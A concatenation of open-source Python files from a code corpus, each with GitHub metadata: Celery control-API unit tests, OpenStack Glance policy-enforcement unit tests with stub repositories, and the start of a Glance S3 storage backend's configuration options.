            self.mytask.name, '100/m', 'a@w.com', limit=100)
        self.assert_control_called_with_args(
            'rate_limit',
            destination='a@w.com',
            task_name=self.mytask.name,
            rate_limit='100/m',
            _options={'limit': 100},
        )

    def test_time_limit(self):
        self.app.control.time_limit(self.mytask.name, soft=10, hard=20)
        self.assert_control_called_with_args(
            'time_limit',
            destination=None,
            task_name=self.mytask.name,
            soft=10,
            hard=20,
        )

    def test_time_limit__with_destination(self):
        self.app.control.time_limit(
            self.mytask.name, soft=10, hard=20,
            destination='a@q.com', limit=99,
        )
        self.assert_control_called_with_args(
            'time_limit',
            destination='a@q.com',
            task_name=self.mytask.name,
            soft=10,
            hard=20,
            _options={'limit': 99},
        )

    def test_add_consumer(self):
        self.app.control.add_consumer('foo')
        self.assert_control_called_with_args(
            'add_consumer',
            destination=None,
            queue='foo',
            exchange=None,
            exchange_type='direct',
            routing_key=None,
        )

    def test_add_consumer__with_options_and_dest(self):
        self.app.control.add_consumer(
            'foo', 'ex', 'topic', 'rkey', destination='a@q.com', limit=78)
        self.assert_control_called_with_args(
            'add_consumer',
            destination='a@q.com',
            queue='foo',
            exchange='ex',
            exchange_type='topic',
            routing_key='rkey',
            _options={'limit': 78},
        )

    def test_cancel_consumer(self):
        self.app.control.cancel_consumer('foo')
        self.assert_control_called_with_args(
            'cancel_consumer',
            destination=None,
            queue='foo',
        )

    def test_cancel_consumer__with_destination(self):
        self.app.control.cancel_consumer(
            'foo', destination='w1@q.com', limit=3)
        self.assert_control_called_with_args(
            'cancel_consumer',
            destination='w1@q.com',
            queue='foo',
            _options={'limit': 3},
        )

    def test_shutdown(self):
        self.app.control.shutdown()
        self.assert_control_called_with_args('shutdown', destination=None)

    def test_shutdown__with_destination(self):
        self.app.control.shutdown(destination='a@q.com', limit=3)
        self.assert_control_called_with_args(
            'shutdown', destination='a@q.com', _options={'limit': 3})

    def test_heartbeat(self):
        self.app.control.heartbeat()
        self.assert_control_called_with_args('heartbeat', destination=None)

    def test_heartbeat__with_destination(self):
        self.app.control.heartbeat(destination='a@q.com', limit=3)
        self.assert_control_called_with_args(
            'heartbeat', destination='a@q.com', _options={'limit': 3})

    def test_pool_restart(self):
        self.app.control.pool_restart()
        self.assert_control_called_with_args(
            'pool_restart',
            destination=None,
            modules=None,
            reload=False,
            reloader=None)

    def test_terminate(self):
        # terminate() is a thin wrapper around revoke(terminate=True).
        self.app.control.revoke = Mock(name='revoke')
        self.app.control.terminate('124')
        self.app.control.revoke.assert_called_with(
            '124', destination=None,
            terminate=True,
            signal=control.TERM_SIGNAME,
        )

    def test_enable_events(self):
        self.app.control.enable_events()
        self.assert_control_called_with_args('enable_events', destination=None)

    def test_enable_events_with_destination(self):
        self.app.control.enable_events(destination='a@q.com', limit=3)
        self.assert_control_called_with_args(
            'enable_events', destination='a@q.com', _options={'limit': 3})

    def test_disable_events(self):
        self.app.control.disable_events()
        self.assert_control_called_with_args(
            'disable_events', destination=None)

    def test_disable_events_with_destination(self):
        self.app.control.disable_events(destination='a@q.com', limit=3)
        self.assert_control_called_with_args(
            'disable_events', destination='a@q.com', _options={'limit': 3})

    def test_ping(self):
        self.app.control.ping()
        self.assert_control_called_with_args(
            'ping', destination=None,
            _options={'timeout': 1.0, 'reply': True})

    def test_ping_with_destination(self):
        self.app.control.ping(destination='a@q.com', limit=3)
        self.assert_control_called_with_args(
            'ping',
            destination='a@q.com',
            _options={
                'limit': 3,
                'timeout': 1.0,
                'reply': True,
            })

    def test_revoke(self):
        self.app.control.revoke('foozbaaz')
        self.assert_control_called_with_args(
            'revoke',
            destination=None,
            task_id='foozbaaz',
            signal=control.TERM_SIGNAME,
            terminate=False,
        )

    def test_revoke__with_options(self):
        self.app.control.revoke(
            'foozbaaz',
            destination='a@q.com',
            terminate=True,
            signal='KILL',
            limit=404,
        )
        self.assert_control_called_with_args(
            'revoke',
            destination='a@q.com',
            task_id='foozbaaz',
            signal='KILL',
            terminate=True,
            _options={'limit': 404},
        )

    def test_election(self):
        self.app.control.election('some_id', 'topic', 'action')
        self.assert_control_called_with_args(
            'election',
            destination=None,
            topic='topic',
            action='action',
            id='some_id',
            _options={'connection': None},
        )

    def test_autoscale(self):
        self.app.control.autoscale(300, 10)
        self.assert_control_called_with_args(
            'autoscale', max=300, min=10, destination=None)

    def test_autoscale__with_options(self):
        self.app.control.autoscale(300, 10, destination='a@q.com', limit=39)
        self.assert_control_called_with_args(
            'autoscale', max=300, min=10,
            destination='a@q.com',
            _options={'limit': 39}
        )

    def test_pool_grow(self):
        self.app.control.pool_grow(2)
        self.assert_control_called_with_args(
            'pool_grow', n=2, destination=None)

    def test_pool_grow__with_options(self):
        self.app.control.pool_grow(2, destination='a@q.com', limit=39)
        self.assert_control_called_with_args(
            'pool_grow', n=2,
            destination='a@q.com',
            _options={'limit': 39}
        )

    def test_pool_shrink(self):
        self.app.control.pool_shrink(2)
        self.assert_control_called_with_args(
            'pool_shrink', n=2, destination=None)

    def test_pool_shrink__with_options(self):
        self.app.control.pool_shrink(2, destination='a@q.com', limit=39)
        self.assert_control_called_with_args(
            'pool_shrink', n=2,
            destination='a@q.com',
            _options={'limit': 39}
        )

    def test_revoke_from_result(self):
        # AsyncResult.revoke must delegate to Control.revoke.
        self.app.control.revoke = Mock(name='revoke')
        self.app.AsyncResult('foozbazzbar').revoke()
        self.app.control.revoke.assert_called_with(
            'foozbazzbar',
            connection=None, reply=False, signal=None,
            terminate=False, timeout=None)

    def test_revoke_from_resultset(self):
        # GroupResult.revoke revokes all member task ids in one call.
        self.app.control.revoke = Mock(name='revoke')
        uuids = [uuid() for _ in range(10)]
        r = self.app.GroupResult(
            uuid(), [self.app.AsyncResult(x) for x in uuids])
        r.revoke()
        self.app.control.revoke.assert_called_with(
            uuids,
            connection=None, reply=False, signal=None,
            terminate=False, timeout=None)

    def test_after_fork_clears_mailbox_pool(self):
        # The mailbox must pick up the *current* producer pool after a
        # fork, not keep the pre-fork (closed) one.
        amqp = Mock(name='amqp')
        self.app.amqp = amqp
        closed_pool = Mock(name='closed pool')
        amqp.producer_pool = closed_pool
        assert closed_pool is self.app.control.mailbox.producer_pool
        self.app.control._after_fork()
        new_pool = Mock(name='new pool')
        amqp.producer_pool = new_pool
        assert new_pool is self.app.control.mailbox.producer_pool
| {
"content_hash": "ca4d0a23d30197db64cbfbd9d20b4556",
"timestamp": "",
"source": "github",
"line_count": 500,
"max_line_length": 79,
"avg_line_length": 33.104,
"alnum_prop": 0.5776945384243596,
"repo_name": "kawamon/hue",
"id": "6406590b7e50b20cb014baf15ad747de83e7f82a",
"size": "16552",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/celery-4.2.1/t/unit/app/test_control.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
"bytes": "3204"
},
{
"name": "Python",
"bytes": "76440000"
},
{
"name": "R",
"bytes": "2445"
},
{
"name": "Roff",
"bytes": "95764"
},
{
"name": "Ruby",
"bytes": "1098"
},
{
"name": "Rust",
"bytes": "495"
},
{
"name": "Scala",
"bytes": "1541"
},
{
"name": "Scheme",
"bytes": "559"
},
{
"name": "Shell",
"bytes": "190718"
},
{
"name": "Smarty",
"bytes": "130"
},
{
"name": "TSQL",
"bytes": "10013"
},
{
"name": "Tcl",
"bytes": "899"
},
{
"name": "TeX",
"bytes": "165743"
},
{
"name": "Thrift",
"bytes": "317058"
},
{
"name": "TypeScript",
"bytes": "1607"
},
{
"name": "VBA",
"bytes": "2884"
},
{
"name": "VBScript",
"bytes": "938"
},
{
"name": "VHDL",
"bytes": "830"
},
{
"name": "Vala",
"bytes": "485"
},
{
"name": "Verilog",
"bytes": "274"
},
{
"name": "Vim Snippet",
"bytes": "226931"
},
{
"name": "XQuery",
"bytes": "114"
},
{
"name": "XSLT",
"bytes": "521413"
},
{
"name": "Yacc",
"bytes": "2133855"
}
],
"symlink_target": ""
} |
from collections import abc
from unittest import mock
import hashlib
import os.path
import oslo_config.cfg
from oslo_policy import policy as common_policy
import glance.api.policy
from glance.common import exception
import glance.context
from glance.policies import base as base_policy
from glance.tests.unit import base
# Fixed image UUID shared by the stub classes and tests below.
UUID1 = 'c80a1a6c-bd1f-41c5-90ee-81afedb1d58d'
class IterableMock(mock.Mock, abc.Iterable):
    """A Mock that also satisfies ``collections.abc.Iterable``.

    Iterating an instance yields nothing at all.
    """

    def __iter__(self):
        # Empty generator: the unreachable ``yield`` makes this a
        # generator function, so iter() returns an exhausted iterator.
        return
        yield
class ImageRepoStub(object):
    """Image repository stand-in returning canned marker values."""

    def __init__(self):
        # Fake DB layer: member lookups always report a single member.
        self.db_api = mock.Mock()
        self.db_api.image_member_find.return_value = [{'member': 'foo'}]

    def get(self, *args, **kwargs):
        # Wrap a fresh stub image in a policy proxy with mocked
        # context/enforcer, mirroring what the real repo would return.
        return glance.api.policy.ImageProxy(
            ImageStub(image_id=UUID1), mock.Mock(), mock.Mock()
        )

    def save(self, *args, **kwargs):
        return 'image_from_save'

    def add(self, *args, **kwargs):
        return 'image_from_add'

    def list(self, *args, **kwargs):
        return ['image_from_list_%d' % i for i in range(2)]
class ImageStub(object):
    """In-memory stand-in for a glance Image domain object.

    Constructor arguments cover the fields the tests vary; every other
    attribute gets a fixed canned value.
    """

    def __init__(self, image_id=None, visibility='private',
                 container_format='bear', disk_format='raw',
                 status='active', extra_properties=None,
                 os_hidden=False):
        # Caller-controlled fields.
        self.image_id = image_id
        self.visibility = visibility
        self.container_format = container_format
        self.disk_format = disk_format
        self.status = status
        self.extra_properties = (
            {} if extra_properties is None else extra_properties)
        self.os_hidden = os_hidden
        # Fixed checksum/hash fields.
        self.checksum = 'c2e5db72bd7fd153f53ede5da5a06de3'
        self.os_hash_algo = 'sha512'
        self.os_hash_value = hashlib.sha512(b'glance').hexdigest()
        # Fixed metadata.
        self.created_at = '2013-09-28T15:27:36Z'
        self.updated_at = '2013-09-28T15:27:37Z'
        self.locations = []
        self.min_disk = 0
        self.min_ram = 0
        self.name = 'image_name'
        self.owner = 'tenant1'
        self.protected = False
        self.size = 0
        self.virtual_size = 0
        self.tags = []
        # The stub image's sole member is its owner.
        self.member = self.owner

    def delete(self):
        """Mark the image deleted (status transition only)."""
        self.status = 'deleted'
class ImageFactoryStub(object):
    """Factory stub: records visibility/hidden, returns a marker string."""

    def new_image(self, image_id=None, name=None, visibility='private',
                  min_disk=0, min_ram=0, protected=False, owner=None,
                  disk_format=None, container_format=None,
                  extra_properties=None, hidden=False, tags=None,
                  **other_args):
        # Remember the two arguments the policy tests inspect later.
        self.visibility, self.hidden = visibility, hidden
        return 'new_image'
class MemberRepoStub(object):
    """Image-member repository stub; mutators tag the member with a marker."""

    image = None

    @staticmethod
    def _mark(member, action):
        # Record which repository operation last touched the member.
        member.output = 'member_repo_%s' % action

    def add(self, image_member):
        self._mark(image_member, 'add')

    def get(self, *args, **kwargs):
        return 'member_repo_get'

    def save(self, image_member, from_state=None):
        self._mark(image_member, 'save')

    def list(self, *args, **kwargs):
        return 'member_repo_list'

    def remove(self, image_member):
        self._mark(image_member, 'remove')
class ImageMembershipStub(object):
    """Bare membership record carrying only an ``output`` marker slot."""

    def __init__(self, output=None):
        # Filled in by MemberRepoStub's mutator methods.
        self.output = output
class TaskRepoStub(object):
    """Task repository stub returning fixed marker values."""

    def get(self, *args, **kwargs):
        return 'task_from_get'

    def add(self, *args, **kwargs):
        return 'task_from_add'

    def list(self, *args, **kwargs):
        return ['task_from_list_%d' % n for n in (0, 1)]
class TaskStub(object):
    """Task stub with a two-step status lifecycle: pending -> processing."""

    def __init__(self, task_id):
        self.task_id = task_id
        self.status = 'pending'

    def run(self, executor):
        # The stub ignores the executor entirely; it only flips status.
        self.status = 'processing'
class TaskFactoryStub(object):
    """Factory stub: always hands back the marker string 'new_task'."""

    def new_task(self, *args):
        return 'new_task'
class MdNamespaceRepoStub(object):
    """Metadef namespace repository stub returning fixed marker strings."""

    def add(self, namespace):
        return 'mdns_add'

    def get(self, namespace):
        return 'mdns_get'

    def list(self, *args, **kwargs):
        return ['mdns_list']

    def save(self, namespace):
        return 'mdns_save'

    def remove(self, namespace):
        return 'mdns_remove'

    def remove_tags(self, namespace):
        # Distinct 'mdtags_' prefix: this marker is checked separately.
        return 'mdtags_remove'
class MdObjectRepoStub(object):
    """Metadef object repository stub returning fixed marker strings."""

    def add(self, obj):
        return 'mdobj_add'

    def get(self, ns, obj_name):
        return 'mdobj_get'

    def list(self, *args, **kwargs):
        return ['mdobj_list']

    def save(self, obj):
        return 'mdobj_save'

    def remove(self, obj):
        return 'mdobj_remove'
class MdResourceTypeRepoStub(object):
    """Metadef resource-type repository stub returning fixed markers."""

    def add(self, rt):
        return 'mdrt_add'

    def get(self, *args, **kwargs):
        return 'mdrt_get'

    def list(self, *args, **kwargs):
        return ['mdrt_list']

    def remove(self, *args, **kwargs):
        return 'mdrt_remove'
class MdPropertyRepoStub(object):
    """Metadef property repository stub returning fixed marker strings."""

    def add(self, prop):
        return 'mdprop_add'

    def get(self, ns, prop_name):
        return 'mdprop_get'

    def list(self, *args, **kwargs):
        return ['mdprop_list']

    def save(self, prop):
        return 'mdprop_save'

    def remove(self, prop):
        return 'mdprop_remove'
class MdTagRepoStub(object):
    """Metadef tag repository stub returning fixed marker strings."""

    def add(self, tag):
        return 'mdtag_add'

    def add_tags(self, tags, can_append=False):
        return ['mdtag_add_tags']

    def get(self, ns, tag_name):
        return 'mdtag_get'

    def list(self, *args, **kwargs):
        return ['mdtag_list']

    def save(self, tag):
        return 'mdtag_save'

    def remove(self, tag):
        return 'mdtag_remove'
class TestPolicyEnforcer(base.IsolatedUnitTest):
    """Tests for glance's policy Enforcer wrapper around oslo.policy."""

    def test_policy_enforce_unregistered(self):
        """enforce() on an unregistered rule raises PolicyNotRegistered."""
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(glance.api.policy.policy.PolicyNotRegistered,
                          enforcer.enforce,
                          context, 'wibble', {})

    def test_policy_check_unregistered(self):
        """check() on an unregistered rule raises PolicyNotRegistered."""
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(glance.api.policy.policy.PolicyNotRegistered,
                          enforcer.check,
                          context, 'wibble', {})

    def test_policy_file_default_rules_default_location(self):
        """Default rules allow a project reader to get their own image."""
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=['reader'])
        enforcer.enforce(context, 'get_image',
                         {'project_id': context.project_id})

    def test_policy_file_custom_rules_default_location(self):
        """A '!' rule from the default policy file denies get_image."""
        rules = {"get_image": '!'}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(exception.Forbidden,
                          enforcer.enforce, context, 'get_image', {})

    def test_policy_file_custom_location(self):
        """Rules are honored when the policy file lives at a custom path."""
        self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
                    group='oslo_policy')
        rules = {"get_image": '!'}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(exception.Forbidden,
                          enforcer.enforce, context, 'get_image', {})

    def test_policy_file_check(self):
        """check() returns False (instead of raising) on a denied rule."""
        self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
                    group='oslo_policy')
        rules = {"get_image": '!'}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertEqual(False, enforcer.check(context, 'get_image', {}))

    def test_policy_file_get_image_default_everybody(self):
        """An empty 'default' rule permits get_image for anyone."""
        rules = {"default": ''}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertEqual(True, enforcer.check(context, 'get_image', {}))

    def test_policy_file_get_image_default_nobody(self):
        """A '!' 'default' rule denies get_image for everyone."""
        rules = {"default": '!'}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(exception.Forbidden,
                          enforcer.enforce, context, 'get_image', {})

    def _test_enforce_scope(self):
        # Helper: register a system-scoped rule, then enforce it with a
        # project-scoped context; result depends on [oslo_policy]
        # enforce_scope set by the caller.
        policy_name = 'foo'
        rule = common_policy.RuleDefault(
            name=policy_name, check_str='role:bar', scope_types=['system'])
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        enforcer.register_default(rule)
        context = glance.context.RequestContext(
            user_id='user', project_id='project', roles=['bar'])
        target = {}
        return enforcer.enforce(context, policy_name, target)

    def test_policy_enforcer_raises_forbidden_when_enforcing_scope(self):
        # Make sure we raise an exception if the context scope doesn't match
        # the scope of the rule when oslo.policy is configured to raise an
        # exception.
        self.config(enforce_scope=True, group='oslo_policy')
        self.assertRaises(exception.Forbidden, self._test_enforce_scope)

    def test_policy_enforcer_does_not_raise_forbidden(self):
        # Make sure we don't raise an exception for mismatched scopes unless
        # oslo.policy is configured to do so.
        self.config(enforce_scope=False, group='oslo_policy')
        self.assertTrue(self._test_enforce_scope())

    def test_ensure_context_object_is_passed_to_policy_enforcement(self):
        # The oslo.policy Enforcer does some useful translation for us if we
        # pass it an oslo.context.RequestContext object. This prevents us from
        # having to handle the translation to a valid credential dictionary in
        # glance.
        context = glance.context.RequestContext()
        mock_enforcer = self.mock_object(common_policy.Enforcer, 'enforce')
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        enforcer.register_default(
            common_policy.RuleDefault(name='foo', check_str='role:bar')
        )
        enforcer.enforce(context, 'foo', {})
        mock_enforcer.assert_called_once_with('foo', {}, context,
                                              do_raise=True,
                                              exc=exception.Forbidden,
                                              action='foo')
        # Reset the mock and make sure glance.api.policy.Enforcer.check()
        # behaves the same way.
        mock_enforcer.reset_mock()
        enforcer.check(context, 'foo', {})
        mock_enforcer.assert_called_once_with('foo', {}, context)

    def test_ensure_experimental_warning_is_logged_for_secure_rbac(self):
        """Enabling secure RBAC logs the EXPERIMENTAL warning exactly once."""
        self.config(enforce_new_defaults=True, group='oslo_policy')
        self.config(enforce_secure_rbac=True)
        expected_log_string = (
            "Deploying glance with secure RBAC personas enabled via "
            "`glance-api.conf [DEFAULT] enforce_secure_rbac=True` and "
            "`glance-api.conf [oslo_policy] enforce_new_defaults=True` "
            "is marked as EXPERIMENTAL in Wallaby. The status of this "
            "feature will graduate to SUPPORTED as glance adopts more "
            "personas, specifically for system-scope."
        )
        with mock.patch.object(glance.api.policy, 'LOG') as mock_log:
            glance.api.policy.Enforcer(
                suppress_deprecation_warnings=True)
            mock_log.warning.assert_called_once_with(expected_log_string)

    def test_ensure_experimental_warning_is_not_logged_for_legacy_rbac(self):
        """Legacy defaults do not trigger the EXPERIMENTAL warning."""
        self.config(enforce_new_defaults=False, group='oslo_policy')
        with mock.patch.object(glance.api.policy, 'LOG') as mock_log:
            glance.api.policy.Enforcer(
                suppress_deprecation_warnings=True)
            mock_log.warning.assert_not_called()
class TestPolicyEnforcerNoFile(base.IsolatedUnitTest):
    """Enforcer behavior when no policy file can be loaded from disk."""

    def test_policy_file_specified_but_not_found(self):
        """Missing defined policy file should result in a default ruleset"""
        self.config(policy_file='gobble.gobble', group='oslo_policy')
        self.config(enforce_new_defaults=True, group='oslo_policy')
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(exception.Forbidden,
                          enforcer.enforce, context, 'manage_image_cache', {})
        # The in-code default still grants the admin role access.
        admin_context = glance.context.RequestContext(roles=['admin'])
        enforcer.enforce(admin_context, 'manage_image_cache', {})

    def test_policy_file_default_not_found(self):
        """Missing default policy file should result in a default ruleset"""
        self.config(enforce_new_defaults=True, group='oslo_policy')

        # Make oslo.config report that no policy file exists anywhere.
        def fake_find_file(self, name):
            return None
        self.mock_object(oslo_config.cfg.ConfigOpts, 'find_file',
                         fake_find_file)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[])
        self.assertRaises(exception.Forbidden,
                          enforcer.enforce, context, 'manage_image_cache', {})
        # The in-code default still grants the admin role access.
        admin_context = glance.context.RequestContext(roles=['admin'])
        enforcer.enforce(admin_context, 'manage_image_cache', {})
class TestContextPolicyEnforcer(base.IsolatedUnitTest):
    """How the context_is_admin policy rule influences context.is_admin."""

    def _do_test_policy_influence_context_admin(self,
                                                policy_admin_role,
                                                context_role,
                                                context_is_admin,
                                                admin_expected):
        # Helper: set context_is_admin to require ``policy_admin_role``,
        # build a context with ``context_role`` / ``context_is_admin``,
        # and assert the resulting context.is_admin value.
        self.config(policy_file=os.path.join(self.test_dir, 'gobble.gobble'),
                    group='oslo_policy')
        rules = {'context_is_admin': 'role:%s' % policy_admin_role}
        self.set_policy_rules(rules)
        enforcer = glance.api.policy.Enforcer(
            suppress_deprecation_warnings=True)
        context = glance.context.RequestContext(roles=[context_role],
                                                is_admin=context_is_admin,
                                                policy_enforcer=enforcer)
        self.assertEqual(admin_expected, context.is_admin)

    def test_context_admin_policy_admin(self):
        """Admin flag + matching admin role stays admin."""
        self._do_test_policy_influence_context_admin('test_admin',
                                                     'test_admin',
                                                     True,
                                                     True)

    def test_context_nonadmin_policy_admin(self):
        """Matching admin role promotes a non-admin context to admin."""
        self._do_test_policy_influence_context_admin('test_admin',
                                                     'test_admin',
                                                     False,
                                                     True)

    def test_context_admin_policy_nonadmin(self):
        """Explicit is_admin=True is kept even without the admin role."""
        self._do_test_policy_influence_context_admin('test_admin',
                                                     'demo',
                                                     True,
                                                     True)

    def test_context_nonadmin_policy_nonadmin(self):
        """No admin flag and no admin role means not admin."""
        self._do_test_policy_influence_context_admin('test_admin',
                                                     'demo',
                                                     False,
                                                     False)
class TestDefaultPolicyCheckStrings(base.IsolatedUnitTest):
    """Pin the exact check strings exported by glance.policies.base."""

    def test_project_member_check_string(self):
        expected = 'role:member and project_id:%(project_id)s'
        self.assertEqual(expected, base_policy.PROJECT_MEMBER)

    def test_admin_or_project_member_check_string(self):
        expected = 'role:admin or (role:member and project_id:%(project_id)s)'
        self.assertEqual(expected, base_policy.ADMIN_OR_PROJECT_MEMBER)

    def test_project_member_download_image_check_string(self):
        expected = (
            "role:member and (project_id:%(project_id)s or "
            "project_id:%(member_id)s or 'community':%(visibility)s or "
            "'public':%(visibility)s or 'shared':%(visibility)s)"
        )
        self.assertEqual(
            expected,
            base_policy.
            PROJECT_MEMBER_OR_IMAGE_MEMBER_OR_COMMUNITY_OR_PUBLIC_OR_SHARED
        )

    def test_project_reader_check_string(self):
        expected = 'role:reader and project_id:%(project_id)s'
        self.assertEqual(expected, base_policy.PROJECT_READER)

    def test_admin_or_project_reader_check_string(self):
        expected = 'role:admin or (role:reader and project_id:%(project_id)s)'
        self.assertEqual(expected, base_policy.ADMIN_OR_PROJECT_READER)

    def test_project_reader_get_image_check_string(self):
        expected = (
            "role:reader and (project_id:%(project_id)s or "
            "project_id:%(member_id)s or \'community\':%(visibility)s or "
            "'public':%(visibility)s or 'shared':%(visibility)s)"
        )
        self.assertEqual(
            expected,
            base_policy.
            PROJECT_READER_OR_IMAGE_MEMBER_OR_COMMUNITY_OR_PUBLIC_OR_SHARED
        )
class TestImageTarget(base.IsolatedUnitTest):
    """Tests for the dict-like ImageTarget wrapper around an image."""

    def test_image_target_ignores_locations(self):
        """'locations' must not be exposed as a policy-target key."""
        image = ImageStub()
        target = glance.api.policy.ImageTarget(image)
        self.assertNotIn('locations', list(target))

    def test_image_target_project_id_alias(self):
        """'project_id' aliases the image owner alongside 'owner'."""
        image = ImageStub()
        target = glance.api.policy.ImageTarget(image)
        self.assertIn('project_id', target)
        self.assertEqual(image.owner, target['project_id'])
        self.assertEqual(image.owner, target['owner'])

    def test_image_target_transforms(self):
        """Aliased keys map to attributes without hiding the originals."""
        fake_image = mock.MagicMock()
        fake_image.image_id = mock.sentinel.image_id
        fake_image.owner = mock.sentinel.owner
        fake_image.member = mock.sentinel.member
        target = glance.api.policy.ImageTarget(fake_image)
        # Make sure the key transforms work
        self.assertEqual(mock.sentinel.image_id, target['id'])
        self.assertEqual(mock.sentinel.owner, target['project_id'])
        self.assertEqual(mock.sentinel.member, target['member_id'])
        # Also make sure the base properties still work
        self.assertEqual(mock.sentinel.image_id, target['image_id'])
        self.assertEqual(mock.sentinel.owner, target['owner'])
        self.assertEqual(mock.sentinel.member, target['member'])
| {
"content_hash": "a0c084a7e939477154dc8bce4ef1454a",
"timestamp": "",
"source": "github",
"line_count": 560,
"max_line_length": 78,
"avg_line_length": 34.4125,
"alnum_prop": 0.5948316122671371,
"repo_name": "openstack/glance",
"id": "70ad783e7acae75f4c9b03d0fecb82882c782d41",
"size": "19934",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "glance/tests/unit/test_policy.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "1353"
},
{
"name": "Mako",
"bytes": "431"
},
{
"name": "Python",
"bytes": "4008354"
},
{
"name": "Shell",
"bytes": "3184"
}
],
"symlink_target": ""
} |
"""Storage backend for S3 or Storage Servers that follow the S3 Protocol"""
import hashlib
import httplib
import re
import tempfile
import urlparse
from oslo.config import cfg
from glance.common import exception
from glance.common import utils
import glance.openstack.common.log as logging
import glance.store
import glance.store.base
import glance.store.location
LOG = logging.getLogger(__name__)
# Configuration options for the S3 store backend, registered on the
# global CONF object below.
s3_opts = [
    cfg.StrOpt('s3_store_host',
               help=_('The host where the S3 server is listening.')),
    cfg.StrOpt('s3_store_access_key', secret=True,
               help=_('The S3 query token access key.')),
    cfg.StrOpt('s3_store_secret_key', secret=True,
               help=_('The S3 query token secret key.')),
    cfg.StrOpt('s3_store_bucket',
               help=_('The S3 bucket to be used to store the Glance data.')),
    cfg.StrOpt('s3_store_object_buffer_dir',
               help=_('The local directory where uploads will be staged '
                      'before they are transfered into S3.')),
    cfg.BoolOpt('s3_store_create_bucket_on_put', default=False,
                help=_('A boolean to determine if the S3 bucket should be '
                       'created on upload if it does not exist or if '
                       'an error should be returned to the user.')),
    cfg.StrOpt('s3_store_bucket_url_format', default='subdomain',
               help=_('The S3 calling format used to determine the bucket. '
                      'Either subdomain or path can be used.')),
]

CONF = cfg.CONF
CONF.register_opts(s3_opts)
